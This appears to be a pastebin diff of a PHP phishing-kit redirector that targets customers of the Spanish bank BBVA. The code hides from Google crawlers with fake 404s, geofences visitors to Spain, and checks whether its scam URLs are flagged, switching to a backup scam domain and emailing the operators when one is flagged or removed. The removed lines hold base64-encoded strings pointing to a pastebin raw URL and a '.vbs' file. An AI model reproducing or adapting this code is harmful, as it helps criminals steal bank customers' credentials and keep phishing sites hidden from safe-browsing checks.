SHOW:
|
|
- or go back to the newest paste.
| 1 | - | foreach 'aHR0cDovL3Bhc3RlYmluLmNvbS9yYXcvU0FjNDJCaWE='; |
| 1 | + | error_reporting(0); |
| 2 | - | |
| 2 | + | if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
|
| 3 | - | fwrite 'cGhwLnZicw=='; |
| 3 | + | if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) { header('HTTP/1.0 404 Not Found'); exit(); }
|
| 4 | ######################################## | |
| 5 | $scam1 = 'https://pinedaleca.org/pictures/items/ggg'; | |
| 6 | $scam2 = 'https://itbikes.ec/wp-content/plugins/items/'; | |
| 7 | ######################################## | |
| 8 | $aa = '1'; // Auto Redirecting | |
| 9 | $gg = '1'; // check scam if you remove | |
| 10 | $cc = '0'; // Random check flagged | |
| 11 | $bb = '0'; // block all ip without spain | |
| 12 | ######################################## | |
| 13 | $mail = "rotinabox1@gmail.com,youssef-game@live.fr"; | |
| 14 | ######################################## | |
| 15 | $header = 'https://www.bbva.es/eng/particulares/index.jsp'; | |
| 16 | ######################################## | |
| 17 | include "antibots1.php"; | |
| 18 | include "antibots2.php"; | |
| 19 | include "antibots3.php"; | |
| 20 | function request($scam) {
| |
| 21 | $st = curl_init(); | |
| 22 | curl_setopt($st,CURLOPT_URL,'https://aw-snap.info/utilities/is-flagged.php?url='.base64_encode($scam).'%3D~enc'); | |
| 23 | curl_setopt($st, CURLOPT_RETURNTRANSFER, true); | |
| 24 | curl_setopt($st,CURLOPT_RETURNTRANSFER,1); | |
| 25 | curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1); | |
| 26 | $data = curl_exec($st); //print $data; | |
| 27 | curl_close($st); | |
| 28 | return $data; | |
| 29 | } | |
| 30 | function get($zaba) {
| |
| 31 | $st = curl_init(); | |
| 32 | curl_setopt($st,CURLOPT_URL,$zaba); | |
| 33 | curl_setopt($st, CURLOPT_RETURNTRANSFER, true); | |
| 34 | curl_setopt($st,CURLOPT_RETURNTRANSFER,1); | |
| 35 | curl_setopt($st,CURLOPT_FOLLOWLOCATION, 1); | |
| 36 | $ok = curl_exec($st); | |
| 37 | curl_close($st); | |
| 38 | return $ok; | |
| 39 | } | |
| 40 | if($aa == 1 ){
| |
| 41 | if($bb == 1 ){
| |
| 42 | $ip = getenv("REMOTE_ADDR"); #'91.142.217.133';
| |
| 43 | $ip_data = @json_decode(get("http://www.geoplugin.net/json.gp?ip=".$ip));
| |
| 44 | $dexter = $ip_data->geoplugin_countryCode; | |
| 45 | if(!eregi("ES",$dexter)){
| |
| 46 | header("location: ".$header."");
| |
| 47 | break; | |
| 48 | } | |
| 49 | } | |
| 50 | if($cc == 1 ){
| |
| 51 | if($gg == 1 ){
| |
| 52 | if(!file_exists("removed.txt")) {
| |
| 53 | if(!preg_match_all('#1f3870be274f6c49b3e31a0c6728957f#',get($scam1."/robots.txt"))){
| |
| 54 | mail($mail,"Report Removed - ".rand(),"link it's removed in the time ".date("h:i:sa"));
| |
| 55 | fopen("removed.txt", "ab");
| |
| 56 | header("location: $scam2");
| |
| 57 | break; | |
| 58 | } | |
| 59 | } | |
| 60 | else{
| |
| 61 | header("location: $scam2");
| |
| 62 | break; | |
| 63 | } | |
| 64 | } | |
| 65 | if(!file_exists("detected.txt")) {
| |
| 66 | if(rand(1, 4) == 2 ){
| |
| 67 | if(preg_match_all('#<strong>NOT</strong> currently flagged.</p>#',request($scam1))){
| |
| 68 | header("location: $scam1");
| |
| 69 | } | |
| 70 | elseif(preg_match_all('#<strong>SOCIAL_ENGINEERING</strong>#',request($scam1))){
| |
| 71 | mail($mail,"Report Phishing - ".rand(),"link deceptive in the time ".date("h:i:sa"));
| |
| 72 | fopen("detected.txt", "ab");
| |
| 73 | header("location: $scam2");
| |
| 74 | } | |
| 75 | } | |
| 76 | else{
| |
| 77 | header("location: $scam1");
| |
| 78 | } | |
| 79 | } | |
| 80 | else{
| |
| 81 | header("location: $scam2");
| |
| 82 | } | |
| 83 | break; | |
| 84 | } | |
| 85 | ########## | |
| 86 | if($gg == 1 ){
| |
| 87 | if(!file_exists("removed.txt")) {
| |
| 88 | if(!preg_match_all('#1f3870be274f6c49b3e31a0c6728957f#',get($scam1."/robots.txt"))){
| |
| 89 | mail($mail,"Report Removed - ".rand(),"link it's removed in the time ".date("h:i:sa"));
| |
| 90 | fopen("removed.txt", "ab");
| |
| 91 | header("location: $scam2");
| |
| 92 | break; | |
| 93 | } | |
| 94 | } | |
| 95 | else{
| |
| 96 | header("location: $scam2");
| |
| 97 | break; | |
| 98 | } | |
| 99 | } | |
| 100 | if(!file_exists("detected.txt")) {
| |
| 101 | if(preg_match_all('#<strong>NOT</strong> currently flagged.</p>#',request($scam1))){
| |
| 102 | header("location: $scam1");
| |
| 103 | } | |
| 104 | elseif(preg_match_all('#<strong>SOCIAL_ENGINEERING</strong>#',request($scam1))){
| |
| 105 | mail($mail,"Report Phishing - ".rand(),"link deceptive in the time ".date("h:i:sa"));
| |
| 106 | fopen("detected.txt", "ab");
| |
| 107 | header("location: $scam2");
| |
| 108 | } | |
| 109 | } | |
| 110 | else{
| |
| 111 | header("location: $scam2");
| |
| 112 | } | |
| 113 | } | |
| 114 | else{
| |
| 115 | header("location: $scam1");
| |
| 116 | } |
